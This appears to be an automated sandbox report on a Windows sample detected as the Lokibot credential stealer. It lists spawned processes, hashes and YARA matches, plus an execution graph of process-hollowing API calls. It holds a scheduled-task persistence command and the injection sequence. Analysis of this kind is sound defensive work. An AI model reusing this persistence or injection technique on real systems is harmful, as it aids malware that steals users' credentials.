                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:07:52:00
                                    Start date:28/11/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp"
                                    Imagebase:0x670000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:07:52:00
                                    Start date:28/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:07:52:00
                                    Start date:28/11/2024
                                    Path:C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\FVR-N2411-07396.exe"
                                    Imagebase:0x5a0000
                                    File size:601'088 bytes
                                    MD5 hash:2F402635E17B4F0D9C0D6922D384936A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000007.00000002.3255881950.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Target ID:8
                                    Start time:07:52:02
                                    Start date:28/11/2024
                                    Path:C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
                                    Imagebase:0x480000
                                    File size:601'088 bytes
                                    MD5 hash:2F402635E17B4F0D9C0D6922D384936A
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2130538149.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 47%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:9
                                    Start time:07:52:03
                                    Start date:28/11/2024
                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x7ff6ef0c0000
                                    File size:496'640 bytes
                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:07:52:07
                                    Start date:28/11/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp"
                                    Imagebase:0x670000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:07:52:07
                                    Start date:28/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:07:52:08
                                    Start date:28/11/2024
                                    Path:C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"
                                    Imagebase:0xdd0000
                                    File size:601'088 bytes
                                    MD5 hash:2F402635E17B4F0D9C0D6922D384936A
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Loki_1, Description: Loki Payload, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:11.2%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:212
                                      Total number of Limit Nodes:17
                                      execution_graph 34804 720b6d0 34805 720b85b 34804->34805 34807 720b6f6 34804->34807 34807->34805 34808 7204458 34807->34808 34809 720b950 PostMessageW 34808->34809 34810 720b9bc 34809->34810 34810->34807 34576 7207f32 34577 7207f16 34576->34577 34578 7208116 34577->34578 34582 720a566 34577->34582 34601 720a4f8 34577->34601 34619 720a508 34577->34619 34583 720a4f4 34582->34583 34585 720a569 34582->34585 34637 720ab2b 34583->34637 34643 720ad6b 34583->34643 34648 720b029 34583->34648 34653 720ac08 34583->34653 34662 720acc7 34583->34662 34667 720aa21 34583->34667 34678 720afc1 34583->34678 34683 720b21f 34583->34683 34687 720ac3b 34583->34687 34699 720ae19 34583->34699 34706 720b259 34583->34706 34710 720adb7 34583->34710 34715 720a996 34583->34715 34720 720aab3 34583->34720 34729 720a9ef 34583->34729 34584 720a546 34584->34578 34585->34578 34602 720a522 34601->34602 34604 720afc1 2 API calls 34602->34604 34605 720aa21 4 API calls 34602->34605 34606 720acc7 2 API calls 34602->34606 34607 720ac08 4 API calls 34602->34607 34608 720b029 2 API calls 34602->34608 34609 720ad6b 2 API calls 34602->34609 34610 720ab2b 2 API calls 34602->34610 34611 720a9ef 2 API calls 34602->34611 34612 720aab3 4 API calls 34602->34612 34613 720a996 2 API calls 34602->34613 34614 720adb7 2 API calls 34602->34614 34615 720b259 2 API calls 34602->34615 34616 720ae19 2 API calls 34602->34616 34617 720ac3b 6 API calls 34602->34617 34618 720b21f 2 API calls 34602->34618 34603 720a546 34603->34578 34604->34603 34605->34603 34606->34603 34607->34603 34608->34603 34609->34603 34610->34603 34611->34603 34612->34603 34613->34603 34614->34603 34615->34603 34616->34603 34617->34603 34618->34603 34620 720a522 34619->34620 34622 720afc1 2 API calls 34620->34622 34623 720aa21 4 API calls 34620->34623 34624 720acc7 2 API calls 34620->34624 34625 720ac08 4 API calls 34620->34625 34626 720b029 2 API calls 34620->34626 34627 720ad6b 2 API calls 34620->34627 34628 720ab2b 2 API calls 34620->34628 34629 720a9ef 2 API calls 34620->34629 34630 720aab3 4 API calls 34620->34630 34631 720a996 2 API calls 34620->34631 34632 720adb7 2 API calls 34620->34632 34633 720b259 2 API calls 34620->34633 34634 720ae19 2 API calls 34620->34634 34635 720ac3b 6 API calls 34620->34635 34636 720b21f 2 API calls 34620->34636 34621 720a546 34621->34578 34622->34621 34623->34621 34624->34621 34625->34621 34626->34621 34627->34621 34628->34621 34629->34621 34630->34621 34631->34621 34632->34621 34633->34621 34634->34621 34635->34621 34636->34621 34638 720a9fb 34637->34638 34640 720b38b 34638->34640 34735 7207870 34638->34735 34739 7207878 34638->34739 34639 720adef 34640->34584 34644 720afdf 34643->34644 34743 72076e0 34644->34743 34747 72076d8 34644->34747 34645 720affa 34649 720b032 34648->34649 34751 7207630 34649->34751 34755 7207628 34649->34755 34650 720b093 34650->34584 34654 720aad1 34653->34654 34759 72077b0 34654->34759 34763 72077b8 34654->34763 34655 720a9fb 34656 720b1fa 34655->34656 34660 7207870 WriteProcessMemory 34655->34660 34661 7207878 WriteProcessMemory 34655->34661 34656->34584 34657 720adef 34660->34657 34661->34657 34663 720acd0 34662->34663 34665 7207870 WriteProcessMemory 34663->34665 34666 7207878 WriteProcessMemory 34663->34666 34664 720afa2 34665->34664 34666->34664 34668 720aa40 34667->34668 34669 720aa6a 34667->34669 34668->34669 34671 720a9fb 34668->34671 34674 7207630 ResumeThread 34669->34674 34675 7207628 ResumeThread 34669->34675 34670 720b093 34670->34584 34673 720b38b 34671->34673 34676 7207870 WriteProcessMemory 34671->34676 34677 7207878 WriteProcessMemory 34671->34677 34672 720adef 34673->34584 34674->34670 34675->34670 34676->34672 34677->34672 34679 720afc7 34678->34679 34681 7207630 ResumeThread 34679->34681 34682 7207628 ResumeThread 34679->34682 34680 720b093 34680->34584 34681->34680 34682->34680 34685 72076e0 Wow64SetThreadContext 34683->34685 34686 72076d8 Wow64SetThreadContext 34683->34686 34684 720b239 34685->34684 34686->34684 34767 7207961 34687->34767 34771 7207968 34687->34771 34688 720af21 34688->34584 34689 720a9fb 34691 720b1fa 34689->34691 34695 7207870 WriteProcessMemory 34689->34695 34696 7207878 WriteProcessMemory 34689->34696 34690 720aad1 34690->34688 34693 72077b0 VirtualAllocEx 34690->34693 34694 72077b8 VirtualAllocEx 34690->34694 34691->34584 34692 720adef 34693->34689 34694->34689 34695->34692 34696->34692 34700 720b3c3 34699->34700 34701 720a9fb 34699->34701 34700->34584 34701->34699 34702 720b38b 34701->34702 34704 7207870 WriteProcessMemory 34701->34704 34705 7207878 WriteProcessMemory 34701->34705 34703 720adef 34704->34703 34705->34703 34708 7207870 WriteProcessMemory 34706->34708 34709 7207878 WriteProcessMemory 34706->34709 34707 720b287 34708->34707 34709->34707 34711 720adbd 34710->34711 34713 7207870 WriteProcessMemory 34711->34713 34714 7207878 WriteProcessMemory 34711->34714 34712 720adef 34713->34712 34714->34712 34716 720a99c 34715->34716 34775 7207b00 34716->34775 34779 7207af5 34716->34779 34721 720aab9 34720->34721 34727 72077b0 VirtualAllocEx 34721->34727 34728 72077b8 VirtualAllocEx 34721->34728 34722 720a9fb 34724 720b1fa 34722->34724 34725 7207870 WriteProcessMemory 34722->34725 34726 7207878 WriteProcessMemory 34722->34726 34723 720adef 34724->34584 34725->34723 34726->34723 34727->34722 34728->34722 34730 720a9fb 34729->34730 34732 720b38b 34730->34732 34733 7207870 WriteProcessMemory 34730->34733 34734 7207878 WriteProcessMemory 34730->34734 34731 720adef 34732->34584 34733->34731 34734->34731 34736 7207876 WriteProcessMemory 34735->34736 34738 7207917 34736->34738 34738->34639 34740 72078b2 WriteProcessMemory 34739->34740 34742 7207917 34740->34742 34742->34639 34744 7207725 Wow64SetThreadContext 34743->34744 34746 720776d 34744->34746 34746->34645 34748 72076e0 Wow64SetThreadContext 34747->34748 34750 720776d 34748->34750 34750->34645 34752 7207670 ResumeThread 34751->34752 34754 72076a1 34752->34754 34754->34650 34756 7207630 ResumeThread 34755->34756 34758 72076a1 34756->34758 34758->34650 34760 72077b8 VirtualAllocEx 34759->34760 34762 7207835 34760->34762 34762->34655 34764 72077f8 VirtualAllocEx 34763->34764 34766 7207835 34764->34766 34766->34655 34768 72079b3 ReadProcessMemory 34767->34768 34770 72079f7 34768->34770 34770->34690 34772 72079b3 ReadProcessMemory 34771->34772 34774 72079f7 34772->34774 34774->34690 34776 7207b89 CreateProcessA 34775->34776 34778 7207d4b 34776->34778 34780 7207b00 CreateProcessA 34779->34780 34782 7207d4b 34780->34782 34562 284d0c0 34563 284d106 34562->34563 34567 284d6a8 34563->34567 34570 284d699 34563->34570 34564 284d1f3 34569 284d6d6 34567->34569 34573 284d2fc 34567->34573 34569->34564 34571 284d2fc DuplicateHandle 34570->34571 34572 284d6d6 34571->34572 34572->34564 34574 284d710 DuplicateHandle 34573->34574 34575 284d7a6 34574->34575 34575->34569 34811 284ad30 34812 284ad3f 34811->34812 34815 284ae18 34811->34815 34820 284ae28 34811->34820 34816 284ae5c 34815->34816 34817 284ae39 34815->34817 34816->34812 34817->34816 34818 284b060 GetModuleHandleW 34817->34818 34819 284b08d 34818->34819 34819->34812 34821 284ae5c 34820->34821 34822 284ae39 34820->34822 34821->34812 34822->34821 34823 284b060 GetModuleHandleW 34822->34823 34824 284b08d 34823->34824 34824->34812 34825 4fb4040 34826 4fb4089 34825->34826 34827 4fb4082 34825->34827 34827->34826 34828 4fb40da CallWindowProcW 34827->34828 34828->34826 34783 2844668 34784 284466a 34783->34784 34785 2844686 34784->34785 34787 2844779 34784->34787 34788 284479d 34787->34788 34792 2844888 34788->34792 34796 2844878 34788->34796 34794 28448af 34792->34794 34793 284498c 34793->34793 34794->34793 34800 28444b0 34794->34800 34798 2844888 34796->34798 34797 284498c 34797->34797 34798->34797 34799 28444b0 CreateActCtxA 34798->34799 34799->34797 34801 2845918 CreateActCtxA 34800->34801 34803 28459db 34801->34803
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069457895.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4fb0000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c596422f92136efcdc34fcb4c1a40bcbb9dda63a261b2e5564cef97e28d50f0
                                      • Instruction ID: 93de0ebe17061348c945c81589a788bca4220dde978946c5424da7bdbafef70e
                                      • Opcode Fuzzy Hash: 4c596422f92136efcdc34fcb4c1a40bcbb9dda63a261b2e5564cef97e28d50f0
                                      • Instruction Fuzzy Hash: B992C634A40219CFDB24DF64C994AE9B7B1FF8A305F1181E9D909AB361DB31AE85CF41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069457895.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4fb0000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: efcba28845b373103a1f3535f22ad682f6dc2fa2387c134b92aea4292c294b1b
                                      • Instruction ID: 3aaa8c139ec7cdf9e37f90dbe0bb01d998eea9193bf0b8b0ef4b312bd0376a2e
                                      • Opcode Fuzzy Hash: efcba28845b373103a1f3535f22ad682f6dc2fa2387c134b92aea4292c294b1b
                                      • Instruction Fuzzy Hash: D192C734A40219CFDB24DF64C994AE9B7B1FF8A305F1181E9D909AB361DB31AE85CF41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f5fc53e36009afa6f795557a903019cf6d21a46f57c181184d845cf25a01d1a
                                      • Instruction ID: 663b688345780e5375549d9a6e5e57c05da2c565ee3d87385c0bd4dffae3ffbb
                                      • Opcode Fuzzy Hash: 2f5fc53e36009afa6f795557a903019cf6d21a46f57c181184d845cf25a01d1a
                                      • Instruction Fuzzy Hash: F832ACB5B112098FDB19DB68C460BAEB7F6AF89300F244569E505DB3A1CF34ED41CBA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 521 7207af5-7207b95 524 7207b97-7207ba1 521->524 525 7207bce-7207bee 521->525 524->525 526 7207ba3-7207ba5 524->526 532 7207bf0-7207bfa 525->532 533 7207c27-7207c56 525->533 527 7207ba7-7207bb1 526->527 528 7207bc8-7207bcb 526->528 530 7207bb3 527->530 531 7207bb5-7207bc4 527->531 528->525 530->531 531->531 534 7207bc6 531->534 532->533 535 7207bfc-7207bfe 532->535 539 7207c58-7207c62 533->539 540 7207c8f-7207d49 CreateProcessA 533->540 534->528 537 7207c00-7207c0a 535->537 538 7207c21-7207c24 535->538 541 7207c0c 537->541 542 7207c0e-7207c1d 537->542 538->533 539->540 543 7207c64-7207c66 539->543 553 7207d52-7207dd8 540->553 554 7207d4b-7207d51 540->554 541->542 542->542 544 7207c1f 542->544 545 7207c68-7207c72 543->545 546 7207c89-7207c8c 543->546 544->538 548 7207c74 545->548 549 7207c76-7207c85 545->549 546->540 548->549 549->549 550 7207c87 549->550 550->546 564 7207de8-7207dec 553->564 565 7207dda-7207dde 553->565 554->553 567 7207dfc-7207e00 564->567 568 7207dee-7207df2 564->568 565->564 566 7207de0 565->566 566->564 570 7207e10-7207e14 567->570 571 7207e02-7207e06 567->571 568->567 569 7207df4 568->569 569->567 573 7207e26-7207e2d 570->573 574 7207e16-7207e1c 570->574 571->570 572 7207e08 571->572 572->570 575 7207e44 573->575 576 7207e2f-7207e3e 573->576 574->573 578 7207e45 575->578 576->575 578->578
                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07207D36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: c48130c0b8911899e7f35570a5ab35bd1867627a8ce7238a326e8a48b5f35643
                                      • Instruction ID: 255b96eb4e86f425a1012de736f6be6e041e510459fe7a166fae0da184976453
                                      • Opcode Fuzzy Hash: c48130c0b8911899e7f35570a5ab35bd1867627a8ce7238a326e8a48b5f35643
                                      • Instruction Fuzzy Hash: 9EA13CB1D1021ACFDF24DF68C8417EDBBB6BF44314F1485A9D809A7290DB74A985CFA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 579 7207b00-7207b95 581 7207b97-7207ba1 579->581 582 7207bce-7207bee 579->582 581->582 583 7207ba3-7207ba5 581->583 589 7207bf0-7207bfa 582->589 590 7207c27-7207c56 582->590 584 7207ba7-7207bb1 583->584 585 7207bc8-7207bcb 583->585 587 7207bb3 584->587 588 7207bb5-7207bc4 584->588 585->582 587->588 588->588 591 7207bc6 588->591 589->590 592 7207bfc-7207bfe 589->592 596 7207c58-7207c62 590->596 597 7207c8f-7207d49 CreateProcessA 590->597 591->585 594 7207c00-7207c0a 592->594 595 7207c21-7207c24 592->595 598 7207c0c 594->598 599 7207c0e-7207c1d 594->599 595->590 596->597 600 7207c64-7207c66 596->600 610 7207d52-7207dd8 597->610 611 7207d4b-7207d51 597->611 598->599 599->599 601 7207c1f 599->601 602 7207c68-7207c72 600->602 603 7207c89-7207c8c 600->603 601->595 605 7207c74 602->605 606 7207c76-7207c85 602->606 603->597 605->606 606->606 607 7207c87 606->607 607->603 621 7207de8-7207dec 610->621 622 7207dda-7207dde 610->622 611->610 624 7207dfc-7207e00 621->624 625 7207dee-7207df2 621->625 622->621 623 7207de0 622->623 623->621 627 7207e10-7207e14 624->627 628 7207e02-7207e06 624->628 625->624 626 7207df4 625->626 626->624 630 7207e26-7207e2d 627->630 631 7207e16-7207e1c 627->631 628->627 629 7207e08 628->629 629->627 632 7207e44 630->632 633 7207e2f-7207e3e 630->633 631->630 635 7207e45 632->635 633->632 635->635
                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07207D36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: ec2a5e65c40b4124030546dfc86b967ed667fecd31e4571cc116ff961a3f1b15
                                      • Instruction ID: 88bb28b5b801f8776a1f6b5fae67be058d73ba2ead423e34d269537fdfb28c1e
                                      • Opcode Fuzzy Hash: ec2a5e65c40b4124030546dfc86b967ed667fecd31e4571cc116ff961a3f1b15
                                      • Instruction Fuzzy Hash: 26914DB1D1021ACFDF14DF68C841BADBBB2BF48314F1485A9D809A7390DB74A985CFA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 636 284ae28-284ae37 637 284ae63-284ae67 636->637 638 284ae39-284ae46 call 284a14c 636->638 640 284ae69-284ae73 637->640 641 284ae7b-284aebc 637->641 643 284ae5c 638->643 644 284ae48 638->644 640->641 647 284aebe-284aec6 641->647 648 284aec9-284aed7 641->648 643->637 693 284ae4e call 284b0b0 644->693 694 284ae4e call 284b0c0 644->694 647->648 649 284aed9-284aede 648->649 650 284aefb-284aefd 648->650 652 284aee0-284aee7 call 284a158 649->652 653 284aee9 649->653 655 284af00-284af07 650->655 651 284ae54-284ae56 651->643 654 284af98-284afaf 651->654 657 284aeeb-284aef9 652->657 653->657 667 284afb1-284b010 654->667 658 284af14-284af1b 655->658 659 284af09-284af11 655->659 657->655 661 284af1d-284af25 658->661 662 284af28-284af31 call 284a168 658->662 659->658 661->662 668 284af33-284af3b 662->668 669 284af3e-284af43 662->669 687 284b012-284b058 667->687 668->669 670 284af45-284af4c 669->670 671 284af61-284af6e 669->671 670->671 672 284af4e-284af5e call 284a178 call 284a188 670->672 678 284af70-284af8e 671->678 679 284af91-284af97 671->679 672->671 678->679 688 284b060-284b08b GetModuleHandleW 687->688 689 284b05a-284b05d 687->689 690 284b094-284b0a8 688->690 691 284b08d-284b093 688->691 689->688 691->690 693->651 694->651
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0284B07E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: bbe86be82b5b5541bcc5060a0315b4f7afc07e675ec211839932f501b927da82
                                      • Instruction ID: 12031e06b556db0e8622490ed3c4bdc4ac2ecfa0a4b8c32d8373caa568f39d30
                                      • Opcode Fuzzy Hash: bbe86be82b5b5541bcc5060a0315b4f7afc07e675ec211839932f501b927da82
                                      • Instruction Fuzzy Hash: 227138B8A00B098FD728DF29D05475ABBF5FF88304F008A2DD49ADBA50DB75E845CB91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 695 28444b0-28459d9 CreateActCtxA 699 28459e2-2845a3c 695->699 700 28459db-28459e1 695->700 707 2845a3e-2845a41 699->707 708 2845a4b-2845a4f 699->708 700->699 707->708 709 2845a60-2845a90 708->709 710 2845a51-2845a5d 708->710 714 2845a42-2845a47 709->714 715 2845a92-2845b14 709->715 710->709 714->708
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 028459C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 6edbb59590f4e45778a8b33a813bcbbb979438877a44edb5ec0b3c0a98d5db83
                                      • Instruction ID: fd1de9ae4a8dff15d6c7fbf6144851bfb919107d75db4a9564491d0342b385c2
                                      • Opcode Fuzzy Hash: 6edbb59590f4e45778a8b33a813bcbbb979438877a44edb5ec0b3c0a98d5db83
                                      • Instruction Fuzzy Hash: AD41E3B4C0071DCBDB24DFA9C844B9EBBB5BF49304F60805AD409AB255DB79694ACF90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 718 284590c-284598c 720 284598f-28459d9 CreateActCtxA 718->720 722 28459e2-2845a3c 720->722 723 28459db-28459e1 720->723 730 2845a3e-2845a41 722->730 731 2845a4b-2845a4f 722->731 723->722 730->731 732 2845a60-2845a90 731->732 733 2845a51-2845a5d 731->733 737 2845a42-2845a47 732->737 738 2845a92-2845b14 732->738 733->732 737->731
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 028459C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 1f3dbf4cd171f0dcd61abe26bb9e624090931a4c851a718112c09fe2aa4bf877
                                      • Instruction ID: 9cab8137642e74b9c82b2d4d4b96a5942cf9d81d36ebfcd5336e8af07047d681
                                      • Opcode Fuzzy Hash: 1f3dbf4cd171f0dcd61abe26bb9e624090931a4c851a718112c09fe2aa4bf877
                                      • Instruction Fuzzy Hash: 3741E1B4C0061DCBDB24DFA9C984BCDBBB5BF49304F60806AD418AB254DB79694ACF90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 741 4fb4040-4fb407c 742 4fb412c-4fb414c 741->742 743 4fb4082-4fb4087 741->743 749 4fb414f-4fb415c 742->749 744 4fb40da-4fb4112 CallWindowProcW 743->744 745 4fb4089-4fb40c0 743->745 747 4fb411b-4fb412a 744->747 748 4fb4114-4fb411a 744->748 752 4fb40c9-4fb40d8 745->752 753 4fb40c2-4fb40c8 745->753 747->749 748->747 752->749 753->752
                                      APIs
                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04FB4101
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069457895.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4fb0000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: CallProcWindow
                                      • String ID:
                                      • API String ID: 2714655100-0
                                      • Opcode ID: 06402aeafc48d270204b90f927a07a24395b6a8eefc4d5387d3c4e178b677e4e
                                      • Instruction ID: e7675ab7e102e3ad104b98d93db6a084cd70376b1e4b607893891cf219904af9
                                      • Opcode Fuzzy Hash: 06402aeafc48d270204b90f927a07a24395b6a8eefc4d5387d3c4e178b677e4e
                                      • Instruction Fuzzy Hash: D8414CB4A00309DFDB14CF9AC448AAABBF5FF89314F24C458D559A7322D374A841CFA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
